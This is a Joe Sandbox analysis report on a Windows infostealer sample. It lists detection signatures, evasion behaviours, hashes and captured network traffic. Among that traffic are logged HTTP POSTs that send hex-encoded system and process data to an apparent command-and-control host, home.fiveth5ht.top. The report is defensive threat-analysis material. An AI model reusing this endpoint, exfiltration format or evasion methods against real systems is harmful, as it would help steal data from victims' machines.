Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xdeRtWCeNH.exe

Overview

General Information

Sample name:xdeRtWCeNH.exe
renamed because original name is a hash value
Original sample name:abcff1e6ac84a5ec546b6672ce45bf02.exe
Analysis ID:1581579
MD5:abcff1e6ac84a5ec546b6672ce45bf02
SHA1:e5e8c81f0b1d2ea23adbe79d5a69318a7212bbea
SHA256:3649c7b868952aa06caef1e133c8f4bdcc2a92763380c7e69af4e2f891afd466
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • xdeRtWCeNH.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\xdeRtWCeNH.exe" MD5: ABCFF1E6AC84A5EC546B6672CE45BF02)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: xdeRtWCeNH.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: xdeRtWCeNH.exeVirustotal: Detection: 47%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: xdeRtWCeNH.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: -----BEGIN PUBLIC KEY-----0_2_006EDCF0
Source: xdeRtWCeNH.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_0072A5B0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0072A7F0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0072A7F0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0072A7F0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0072A7F0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0072A7F0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0072A7F0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0072B560
Source: xdeRtWCeNH.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_006C255D
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_006C29FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 501307Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 30 37 35 33 37 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 2
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 501307Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 30 37 35 33 37 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 2
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 3.218.7.103 3.218.7.103
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_0078A8C0 recvfrom,0_2_0078A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 501307Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 30 37 35 33 37 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 2
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: xdeRtWCeNH.exe, 00000000.00000002.1591295634.0000000001A39000.00000004.00000020.00020000.00000000.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1569299436.0000000001A37000.00000004.00000020.00020000.00000000.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1569250697.0000000001A32000.00000004.00000020.00020000.00000000.sdmp, xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: xdeRtWCeNH.exe, 00000000.00000003.1569250697.0000000001A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: xdeRtWCeNH.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: xdeRtWCeNH.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: xdeRtWCeNH.exe, xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: xdeRtWCeNH.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: xdeRtWCeNH.exe, 00000000.00000003.1480088083.0000000001A57000.00000004.00000020.00020000.00000000.sdmp, xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703

System Summary

barindex
PE file contains section with special chars
Source: xdeRtWCeNH.exeStatic PE information: section name:
Source: xdeRtWCeNH.exeStatic PE information: section name: .idata
Source: xdeRtWCeNH.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_3_01AB46DC0_3_01AB46DC
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_3_01ABB4180_3_01ABB418
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006D05B00_2_006D05B0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006D6FA00_2_006D6FA0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006FF1000_2_006FF100
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_0078B1800_2_0078B180
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_007900E00_2_007900E0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A4A0000_2_00A4A000
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A4E0500_2_00A4E050
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_007262100_2_00726210
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_0078C3200_2_0078C320
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_007904200_2_00790420
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A144100_2_00A14410
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006CE6200_2_006CE620
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_0078C7700_2_0078C770
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A447800_2_00A44780
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_0072A7F00_2_0072A7F0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A267300_2_00A26730
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006CA9600_2_006CA960
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006D49400_2_006D4940
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_0077C9000_2_0077C900
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00896AC00_2_00896AC0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_0097AAC00_2_0097AAC0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A38BF00_2_00A38BF0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_0097AB2C0_2_0097AB2C
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006CCBB00_2_006CCBB0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00854B600_2_00854B60
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A4CC900_2_00A4CC90
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00880D800_2_00880D80
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A3CD800_2_00A3CD80
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A44D400_2_00A44D40
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_009DAE300_2_009DAE30
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006E4F700_2_006E4F70
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A12F900_2_00A12F90
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_0078EF900_2_0078EF90
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00788F900_2_00788F90
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006D10E60_2_006D10E6
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A2D4300_2_00A2D430
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A335B00_2_00A335B0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A156D00_2_00A156D0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A517A00_2_00A517A0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_007798800_2_00779880
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A199200_2_00A19920
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A43A700_2_00A43A70
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A31BD00_2_00A31BD0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00701BE00_2_00701BE0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00979C800_2_00979C80
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A27CC00_2_00A27CC0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006D5DB00_2_006D5DB0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006D3ED00_2_006D3ED0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006E5EB00_2_006E5EB0
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: String function: 00705340 appears 50 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: String function: 006DCD40 appears 75 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: String function: 00704F40 appears 344 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: String function: 00704FD0 appears 291 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: String function: 0089CBC0 appears 104 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: String function: 006C71E0 appears 47 times
